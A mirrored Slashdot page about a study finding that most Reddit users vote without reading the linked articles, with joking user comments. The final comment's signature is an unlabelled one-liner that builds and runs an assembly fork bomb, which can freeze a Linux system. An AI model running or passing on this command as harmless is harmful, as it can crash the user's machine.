Slashdot Mirror


New Study Finds That Most Redditors Don't Actually Read the Articles They Vote On (vice.com)

Michael Byrne, writing for Motherboard: According to a paper published in IEEE Transactions on Computational Social Systems by researchers at Notre Dame University, some 73 percent of posts on Reddit are voted on by users that haven't actually clicked through to view the content being rated. This is according to a newly released dataset consisting of all Reddit activity of 309 site users for a one year period. In the process, the researchers identified signs of "cognitive fatigue" in Reddit users most likely to vote on content. Online aggregation is then somewhat a function of mental exhaustion.

13 of 164 comments (clear)

  1. In similar news by Anonymous Coward · · Score: 5, Insightful

    99% of /.ers don't read the articles posted before commenting.

    1. Re:In similar news by datavirtue · · Score: 5, Funny

      Yeah...but we can pull it off. Your average Reddit scum is not qualified to comment without knowing the facts.

      --
      I object to power without constructive purpose. --Spock
  2. Isn't that what mod points are for? by foghelmut · · Score: 5, Insightful

    I mean, that's how it works here too, right?

    1. Re:Isn't that what mod points are for? by Guyle · · Score: 5, Funny

      If I had mod points I'd mod this up because it told me that's what my mod points are for. I didn't even have to read your comment! I just knew it was the right thing to do!

  3. Of course by Galaga88 · · Score: 5, Funny

    I'm going to fully support the results of this study, although I have yet to actually click on it.

  4. UNBGBBIIVCHIDCTIICBG by Rik+Sweeney · · Score: 4, Insightful

    Upvoted Not Because Girl, But Because It Is Very Cool; However, I Do Concede That I Initially Clicked Because Girl.

  5. Bots by leathered · · Score: 5, Interesting

    Reddit upvotes are heavily botted, and I imagine the publishers of these articles are the prime suspects. Clicks mean cash.

    --
    For all intensive porpoises your a bunch of rediculous loosers
  6. Confirmed by 110010001000 · · Score: 5, Insightful

    I just vote up headlines that confirm my worldview and downvote the ones that don't.

  7. Re:Did these users consent to being tracked? by thaylin · · Score: 4, Informative

    They knew they were being studied (it was done by a voluntary browser plugin) but didnt know what specific habits they were studying.

    --
    When you cant win, ad hominem.
  8. Re:I don't believe it by Luthair · · Score: 5, Insightful

    The real irony is of course that it was posted on Slashdot 20-years after this was discovered.

  9. Whether or not this is a problem by king+neckbeard · · Score: 5, Insightful

    To determine whether or not this is a problem, we have to determine what percentage of articles are actually worth reading over the headlines. If the articles are typically just fleshing out the headline, without anything meaningful added, this is efficient, rational behavior.

    --
    This is my signature. There are many like it, but this one is mine.
  10. Orville S1E7 - Majority Rule by brendan.robert · · Score: 4, Insightful

    This episode of The Orville reminds me of this -- it seems that people just make split decisions because they can't be bothered with hearing and weighing the evidence presented to them. Probably because people aren't being asked to think into the areas of possible ambiguity, we just raise them to pick from a selection of choices. The millennial generation might as well be called the multiple choice generation. So glad I'm from the "Choose your own adventure" generation. ;)

  11. Reddit vs 4chan by Hal_Porter · · Score: 4, Interesting

    As someone observed after the "He will not divide us" episode where 4chaners found the flag in a rather clever cunning way - "4chan is smart people pretending to be dumb. Reddit is dumb people pretending to be smart".

    https://www.inquisitr.com/4060...

    So how did 4chan find and steal the He Will Not Divide Us flag?

    It turns out, Shia made one mistake in setting up the camera on the soon-to-be-stolen flag. It was such a simple thing that normal people would never have noticed, but the 4chan trolls sprung into action when they realized the camera was aimed in part at the sky.

    According to various users on 4chan, members of the board used jet contrails, flight paths, and astronomy to determine the general location of the He Will Not Divide Us flag installation. After narrowing down the location to somewhere in Tennesee, 4chan sleuths drove around the area honking their horns to see if the sound would show up on the live stream.

    And as it turns out, they were successful almost immediately, as 4chan found the flag site less than a couple days after it went live. The trolls replaced the stolen flag with the hat and T-shirt mentioned earlier.

    Besides the obvious issues with theft and harassment, 4chan's actions in this incident are merely a part of what has become known to many who study the impact of social media in society as the "Great Meme War."

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;